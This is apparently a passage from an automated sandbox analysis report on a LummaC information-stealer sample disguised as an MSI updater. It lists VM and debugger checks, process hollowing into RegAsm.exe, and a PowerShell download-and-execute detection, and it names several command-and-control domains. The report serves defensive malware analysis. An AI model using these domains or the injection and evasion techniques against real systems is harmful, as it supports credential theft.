Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003370000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002970000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\^q
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000033.00000002.2940801424.000000000124A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process queried: DebugPort
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\zyJWi2vy29.exe

Code function: 0_2_0032BA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0032BA03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

20_2_004CF280

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00336AF1 mov eax, dword ptr fs:[00000030h]	0_2_00336AF1
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00336B35 mov eax, dword ptr fs:[00000030h]	0_2_00336B35
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00331FC4 mov ecx, dword ptr fs:[00000030h]	0_2_00331FC4
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006E6AF1 mov eax, dword ptr fs:[00000030h]	10_2_006E6AF1
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006E6B35 mov eax, dword ptr fs:[00000030h]	10_2_006E6B35
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006E1FC4 mov ecx, dword ptr fs:[00000030h]	10_2_006E1FC4
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00136AF1 mov eax, dword ptr fs:[00000030h]	12_2_00136AF1
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00136B35 mov eax, dword ptr fs:[00000030h]	12_2_00136B35
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00131FC4 mov ecx, dword ptr fs:[00000030h]	12_2_00131FC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0045DB00 mov eax, dword ptr fs:[00000030h]	20_2_0045DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0045DB00 mov eax, dword ptr fs:[00000030h]	20_2_0045DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004D6280 mov eax, dword ptr fs:[00000030h]	20_2_004D6280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00493B60 mov eax, dword ptr fs:[00000030h]	20_2_00493B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004C6D80 mov eax, dword ptr fs:[00000030h]	20_2_004C6D80
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E490B2 mov eax, dword ptr fs:[00000030h]	22_2_00E490B2
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E490F6 mov eax, dword ptr fs:[00000030h]	22_2_00E490F6
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E4447C mov ecx, dword ptr fs:[00000030h]	22_2_00E4447C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_0041ACF3 mov eax, dword ptr fs:[00000030h]	24_2_0041ACF3
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C66AF1 mov eax, dword ptr fs:[00000030h]	32_2_00C66AF1
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C66B35 mov eax, dword ptr fs:[00000030h]	32_2_00C66B35
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C61FC4 mov ecx, dword ptr fs:[00000030h]	32_2_00C61FC4

Source: C:\Users\user\Desktop\zyJWi2vy29.exe

Code function: 0_2_0033E15F GetProcessHeap,

0_2_0033E15F

Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Process token adjusted: Debug
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_003279C6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003279C6
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_0032BA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0032BA03
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00327CC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00327CC9
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00327E25 SetUnhandledExceptionFilter,	0_2_00327E25
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006D79C6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_006D79C6
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006DBA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_006DBA03
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006D7CC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_006D7CC9
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006D7E25 SetUnhandledExceptionFilter,	10_2_006D7E25
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_001279C6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_001279C6
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_0012BA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0012BA03
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00127CC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00127CC9
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00127E25 SetUnhandledExceptionFilter,	12_2_00127E25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00434184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00434184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0043451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_0043451D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00438A64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_00438A64
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E3D883 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00E3D883
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E3993A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00E3993A
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E39A96 SetUnhandledExceptionFilter,	22_2_00E39A96
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: 22_2_00E39BC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00E39BC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE82C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_1FE82C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE842AF SetUnhandledExceptionFilter,	24_2_1FE842AF
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C579C6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_00C579C6
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C5BA03 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00C5BA03
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C57CC9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00C57CC9
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: 32_2_00C57E25 SetUnhandledExceptionFilter,	32_2_00C57E25

Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV168.exe PID: 2504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV168.exe PID: 7744, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\zyJWi2vy29.exe

Code function: 0_2_005E018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_005E018D

Contains functionality to inject threads in other processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

20_2_004CF280

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: pedestriankodwu.xyz
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: towerxxuytwi.xyzd
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: ellaboratepwsz.xyzu
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: penetratedpoopp.xyz
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: swellfrrgwwos.xyz
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: contintnetksows.shop
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: foodypannyjsud.shop
Source: MSIUpdaterV168.exe, 00000020.00000002.1988079659.0000000000C80000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: potterryisiw.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004138BA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,		24_2_004138BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_004137BD CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,		24_2_004137BD

Writes to foreign memory regions

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55D000	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 585000	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58C000	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E62008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55D000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 585000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B06008	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55D000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 585000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58C000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B42008	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55D000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 585000	Jump to behavior
